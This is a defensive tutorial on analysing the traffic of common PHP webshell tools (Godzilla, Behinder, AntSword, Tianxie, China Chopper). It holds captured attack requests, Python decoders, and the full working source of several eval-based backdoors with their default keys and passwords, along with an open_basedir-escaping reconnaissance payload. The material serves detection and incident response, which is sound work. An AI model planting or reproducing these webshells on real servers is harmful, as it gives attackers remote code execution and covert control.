Disclaimer: this article is shared for learning purposes only.

For the common webshell tools you need to know the attack in order to defend well. Executing a backdoor script is what makes the webshell connection possible, so you have to understand the default scripts to read the traffic more clearly and respond more easily.

(Only some of the backdoor code is covered by the traffic analysis here.)

Please point out any flaws, your feedback is welcome.

Godzilla (哥斯拉) traffic
Versions 3.x - 4.x:
You need to know both the password and the key before the transmitted ciphertext can be turned back into plaintext.
Traffic capture

POST /uploads/shell.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Cookie: PHPSESSID=e30bpdvj90mp4gcgo3ukjcoa3t;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Host: 192.168.155.22
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 1413

hacker=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&hhhhacker=LOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3D

HTTP/1.1 200 OK
Host: 192.168.155.22
Date: Tue, 08 Oct 2024 08:57:26 GMT
Connection: close
X-Powered-By: PHP/8.2.23
Set-Cookie: PHPSESSID=e30bpdvj90mp4gcgo3ukjcoa3t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8

7ba0e8f6b3da4a83LOk/NjEyMDhkNkjfav75hiqH9YzMocx4BtpMDVm1f2ed56a3adc98dc
Decrypting the transmitted data

The POST body as captured (URL-encoded):

hacker=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&hhhhacker=LOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3D

After URL-decoding:

hacker=eval(base64_decode(strrev(urldecode(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))));&hhhhacker=LOk/NjEyMDhkNSj+eJf7+3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q+MYHqr+eX0b5m/W+0pmZ1aAZACuehv4+n/JL/kuVddg2HueKnpA//39dah+YjCIqf6FYmI3Ng==

Reversing the quoted string (strrev) gives the base64 of the backdoor:
DQpAc2Vzc2lvbl9zdGFydCgpOw0KQHNldF90aW1lX2xpbWl0KDApOw0KQGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIGVuY29kZSgkRCwkSyl7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7DQogICAgICAgICRjID0gJEtbJGkrMSYxNV07DQogICAgICAgICREWyRpXSA9ICREWyRpXV4kYzsNCiAgICB9DQogICAgcmV0dXJuICREOw0KfQ0KJHBhc3M9J2hoaGhhY2tlcic7DQokcGF5bG9hZE5hbWU9J3BheWxvYWQnOw0KJGtleT0nNzNiNzYxMjA4ZDVjMDVmMic7DQppZiAoaXNzZXQoJF9QT1NUWyRwYXNzXSkpew0KICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOw0KICAgIGlmIChpc3NldCgkX1NFU1NJT05bJHBheWxvYWROYW1lXSkpew0KICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7DQogICAgICAgIGlmIChzdHJwb3MoJHBheWxvYWQsImdldEJhc2ljc0luZm8iKT09PWZhbHNlKXsNCiAgICAgICAgICAgICRwYXlsb2FkPWVuY29kZSgkcGF5bG9hZCwka2V5KTsNCiAgICAgICAgfQ0KCQlldmFsKCRwYXlsb2FkKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDAsMTYpOw0KICAgICAgICBlY2hvIGJhc2U2NF9lbmNvZGUoZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDE2KTsNCiAgICB9ZWxzZXsNCiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2Upew0KICAgICAgICAgICAgJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV09ZW5jb2RlKCRkYXRhLCRrZXkpOw0KICAgICAgICB9DQogICAgfQ0KfQ0K
Decoding further gives the backdoor script:

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='hhhhacker';
$payloadName='payload';
$key='73b761208d5c05f2';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

From this we get:

$pass='hhhhacker';
$key='73b761208d5c05f2';
In the capture, find the transmitted data and decrypt it accordingly, for example this response body:

7ba0e8f6b3da4a83LOk/NjEyMDhkNtCBGq4a12ErNDRqF5fqqKn31KfS2Mf/wOPUPfWS1Bz2gcgHsZD9S7WdbBQcSwNKNdj0kcACNzNi1f2ed56a3adc98dc
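The following Python decoder is an added example (not from the article or from the Godzilla project) that applies the shell's own steps in reverse to the capture above: it undoes the eval(base64_decode(strrev(urldecode(...)))) stager chain, checks a candidate key cheaply (once XORed with the right key the blob starts with the gzip magic 1f 8b 08, because Godzilla gzip-compresses before encode()), and strips the md5($pass.$key) framing from a response. The response it builds for the test is a constructed fixture, not a capture.

```python
import base64
import gzip
import hashlib
from urllib.parse import unquote

def godzilla_xor(data: bytes, key: bytes) -> bytes:
    # Mirrors the shell's encode(): byte i is XORed with key[(i+1) & 15]
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))

def decode_stager(quoted: str) -> bytes:
    # Undo eval(base64_decode(strrev(urldecode('...')))) for the quoted string
    return base64.b64decode(unquote(quoted)[::-1])

def looks_like_godzilla_blob(b64: str, key: str) -> bool:
    # Cheap key check: Godzilla gzip-compresses before encode(), so the right
    # key turns the first bytes into the gzip magic 1f 8b 08 (as in the capture)
    head = base64.b64decode(b64[:8])  # 8 base64 chars -> 6 bytes
    return godzilla_xor(head, key.encode())[:3] == b"\x1f\x8b\x08"

def decode_blob(b64: str, key: str) -> bytes:
    # One PHP_XOR_BASE64 blob (request param value or the middle of a response):
    # base64 -> XOR -> gunzip
    raw = godzilla_xor(base64.b64decode(b64), key.encode())
    return gzip.decompress(raw) if raw[:2] == b"\x1f\x8b" else raw

def response_framing(password: str, key: str):
    # The shell echoes md5($pass.$key)[0:16], the blob, then md5($pass.$key)[16:]
    digest = hashlib.md5((password + key).encode()).hexdigest()
    return digest[:16], digest[16:]

def decode_response(body: str, password: str, key: str) -> bytes:
    prefix, suffix = response_framing(password, key)
    if not (body.startswith(prefix) and body.endswith(suffix)):
        raise ValueError("md5 framing mismatch: wrong pass/key or not this shell")
    return decode_blob(body[16:-16], key)

def build_sample_response(plaintext: bytes, password: str, key: str) -> str:
    # Constructed test fixture (not a real capture): applies the shell's
    # output steps so decode_response() can be exercised offline
    prefix, suffix = response_framing(password, key)
    blob = base64.b64encode(godzilla_xor(gzip.compress(plaintext), key.encode()))
    return prefix + blob.decode() + suffix
```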
Tool decryption

Behinder (冰蝎) traffic
3.x

base64 → AES (iv, key) → base64
Backdoor code

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; // this key is the first 16 characters of the 32-character md5 of the connection password; the default password is rebeyond
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

Decryption

base64 → AES (iv, key) → base64
The IV defaults to 0-9 a-f.
Decrypt, then the data finally returned just needs one more base64 pass.

AntSword (蚁剑) traffic
Traffic capture

POST /1.php HTTP/1.1
Host: 192.168.19.128
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1668
Connection: close

raw=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmI2OTdiZCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICIzOSIuIjM3MCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMzdkMGNlIi4iZDBlYWZiIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKCREPT0iIikkRD1kaXJuYW1lKCRfU0VSVkVSWyJQQVRIX1RSQU5TTEFURUQiXSk7JFI9InskRH0JIjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJDIiwiWiIpYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO31lbHNleyRSLj0iLyI7fSRSLj0iCSI7JHU9KGZ1bmN0aW9uX2V4aXN0cygicG9zaXhfZ2V0ZWdpZCIpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6IiI7JHM9KCR1KT8kdVsibmFtZSJdOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iCXskc30iO2VjaG8gJFI7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D&x=%40eval(%40base64_decode(%24_POST%5Braw%5D))%3B

HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Wed, 13 Nov 2024 03:13:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.29

39370RDovcGhwc3R1ZHlfcHJvL1dXVy9kaWd1bwlDOkQ6CVdpbmRvd3MgTlQgREVTS1RPUC1QRVNMNURSIDYuMiBidWlsZCA5MjAwIChVbmtub3cgV2luZG93cyB2ZXJzaW9uIEJ1c2luZXNzIEVkaXRpb24pIGk1ODYJQWRtaW5pc3RyYXRvcg37d0ced0eafb
Decoding

Note that the leading characters are noise characters.
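An added example (not from the article or from AntSword) for decoding the response in the capture above. The random prefix and suffix around the base64 are not secret: the raw payload itself emits them in its asoutput() function as split string halves (echo "39"."370"; ... echo "37d0ce"."d0eafb";), so an analyst can pull them out of the request and then base64-decode what lies between; padding lost in the capture is restored. PAYLOAD_EXCERPT is a constructed excerpt of that function as it appears once the raw parameter is decoded, and RESPONSE_BODY is the body from the capture above.

```python
import base64
import re

# Constructed excerpt of the decoded raw payload: the asoutput() function that
# frames every response with split-string markers
PAYLOAD_EXCERPT = (
    'function asoutput(){$output=ob_get_contents();ob_end_clean();'
    'echo "39"."370";echo @asenc($output);echo "37d0ce"."d0eafb";}'
)

# Response body from the capture above (its base64 padding did not survive)
RESPONSE_BODY = (
    "39370RDovcGhwc3R1ZHlfcHJvL1dXVy9kaWd1bwlDOkQ6CVdpbmRvd3MgTlQgREVTS1RPUC1QRVNMNURSIDYuMiBidWlsZCA5MjAwIChVbmtub3cgV2luZG93cyB2ZXJzaW9uIEJ1c2luZXNzIEVkaXRpb24pIGk1ODYJQWRtaW5pc3RyYXRvcg37d0ced0eafb"
)

# echo "<a>"."<b>"; echo @asenc($output); echo "<c>"."<d>";
_MARKERS = re.compile(
    r'echo\s*"([^"]*)"\s*\.\s*"([^"]*)";\s*echo\s*@?asenc\(\$output\);'
    r'\s*echo\s*"([^"]*)"\s*\.\s*"([^"]*)";'
)

def extract_markers(payload_php: str):
    # Recover the prefix/suffix the payload wraps around its output
    m = _MARKERS.search(payload_php)
    if not m:
        raise ValueError("no asoutput() marker pattern found in payload")
    return m.group(1) + m.group(2), m.group(3) + m.group(4)

def b64decode_lenient(s: str) -> bytes:
    # Captures and copy/paste often drop '=' padding; restore it
    return base64.b64decode(s + "=" * (-len(s) % 4))

def decode_antsword_response(body: str, payload_php: str) -> str:
    prefix, suffix = extract_markers(payload_php)
    if not (body.startswith(prefix) and body.endswith(suffix)):
        raise ValueError("response is not framed by this payload's markers")
    inner = body[len(prefix):len(body) - len(suffix)]
    return b64decode_lenient(inner).decode("utf-8", errors="replace")
```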
@ini_set("display_errors", "0");@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)){continue;};
        $tmdir=$item."/.b697bd";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)){continue;}
        $tmdir=realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out){return @base64_encode($out);};
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "39"."370";echo @asenc($output);echo "37d0ce"."d0eafb";}
ob_start();
try{
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    $R="{$D}\t";
    if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}
    $R.="\t";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    $R.=php_uname();
    $R.="\t{$s}";
    echo $R;;
}catch(Exception $e){echo "ERROR://".$e->getMessage();};
asoutput();
die();

Data transfer method

Decode according to the encoder that was used.

Tianxie (天蝎) traffic
Backdoor code

<?php
@error_reporting(0);
session_start();
$key="900bc885d7553375";
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(isset($post))
{
    $datas=explode("\n",$post);
    $code=$datas[0];
    $t="base64_"."decode";
    $code=$t($code."");
    for($i=0;$i<strlen($code);$i++) {
        $code[$i] = $code[$i]^$key[$i+1&15];
    }
    $arr=explode('|',$code);
    $func=$arr[0];
    if(isset($arr[1])){
        $p=$arr[1];
        class C{public function __construct($p) {eval($p."");}}
        new C($p);
    }
}
?>
From this we can see the key and that the data is base64-encoded.
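An added example (not from the article or from either tool) that serves both the Tianxie shell above and the no-openssl branch of the Behinder shell earlier, since both use the same XOR loop with key[$i+1&15]: it derives the Behinder key from the connection password, splits the decoded text into func and params the way the shells' explode('|') does, takes only the first line for Tianxie, and reverses the payload's encrypt() on a response. The request it builds for the test is a constructed fixture, not a capture.

```python
import base64
import hashlib

def xor_with_key(data: bytes, key: bytes) -> bytes:
    # Same loop as both shells: byte i is XORed with key[(i+1) & 15]
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))

def behinder_key(password: str) -> str:
    # Behinder 3: key = first 16 hex chars of md5(connection password)
    return hashlib.md5(password.encode()).hexdigest()[:16]

def split_func_params(code: bytes):
    # Both shells explode() the plaintext on '|' into $func and $params;
    # partition() keeps everything after the first '|' as params
    func, _, params = code.partition(b"|")
    return func.decode("latin-1"), params.decode("latin-1")

def decode_tianxie_request(post_body: str, key: str):
    # Tianxie reads only the first line of the body: base64 -> XOR -> 'func|params'
    first_line = post_body.split("\n", 1)[0]
    return split_func_params(xor_with_key(base64.b64decode(first_line), key.encode()))

def decode_behinder_xor_request(post_body: str, key: str):
    # Behinder 3 without the openssl extension: whole body, base64 -> XOR -> 'func|params'
    return split_func_params(xor_with_key(base64.b64decode(post_body), key.encode()))

def decode_xor_response(data: bytes, key: str) -> bytes:
    # Reverse the payload's encrypt(): XOR is its own inverse. If the capture
    # shows base64 text (as the article's does), base64-decode it first.
    return xor_with_key(data, key.encode())

def build_sample_request(func: str, params: str, key: str) -> str:
    # Constructed test fixture (not a real capture): XOR then base64
    return base64.b64encode(xor_with_key(f"{func}|{params}".encode(), key.encode())).decode()
```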
Ciphertext:
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
Tool decryption, then base64 once more, gives:
@error_reporting(0);
header("Content-Type: text/html; charset=UTF-8");
function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){return $s0;}else{return iconv('gbk','utf-8//IGNORE',$str);}
}
function getgbkStr($str){
    $s0 = iconv('gbk','utf-8//IGNORE',$s1); // note: $s1 is used before it is assigned in the original payload
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    if($s1 == $str){return $s1;}else{return iconv('utf-8','gbk//IGNORE',$str);}
}
function main($path="")
{
    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt")){
        for($i=65;$i<=90;$i++){$drive=chr($i).":\\";file_exists($drive) ? $driveList=$driveList.$drive."," : "";}
    }else{
        $driveList="/";
    }
    $currentPath=getcwd()."/";
    $result=$driveList."\r\n".$currentPath."\r\n";
    $path=getgbkStr($path);
    if($path == "") $path = getcwd()."/";
    $allFiles = scandir($path);
    foreach ($allFiles as $fileName) {
        $fullPath = $path . $fileName;
        if($fileName!=".." && $fileName!="."){
            if (!function_exists("mb_convert_encoding")){
                $fileName=getSafeStr($fileName);
            }else{
                $fileName=mb_convert_encoding($fileName, "UTF-8", mb_detect_encoding($fileName, array("UTF-8","auto")));
            }
            if (is_file($fullPath)) {$result=$result.$fileName;} else {$result=$result."dic:".$fileName;}
            $result=$result."\t".filesize($fullPath);
            $result=$result."\t".substr(base_convert(fileperms($fullPath),10,8),-4);
            $result=$result."\t".date("Y-m-d H:i:s", filemtime($fullPath))."\n";
        }
    }
    echo encrypt($result, $_SESSION['k']);
}
function encrypt($data,$key)
{
    for($i=0;$i<strlen($data);$i++) {$data[$i] = $data[$i]^$key[$i+1&15];}
    return $data;
}
$rand="mystrsfbygfxohbkbt";
main($path="C:/");

China Chopper (菜刀) traffic
It is mainly the one-liner password parameter plus base64-encoded z0, z1, z2 and so on, which carry the transmitted data and the returned data.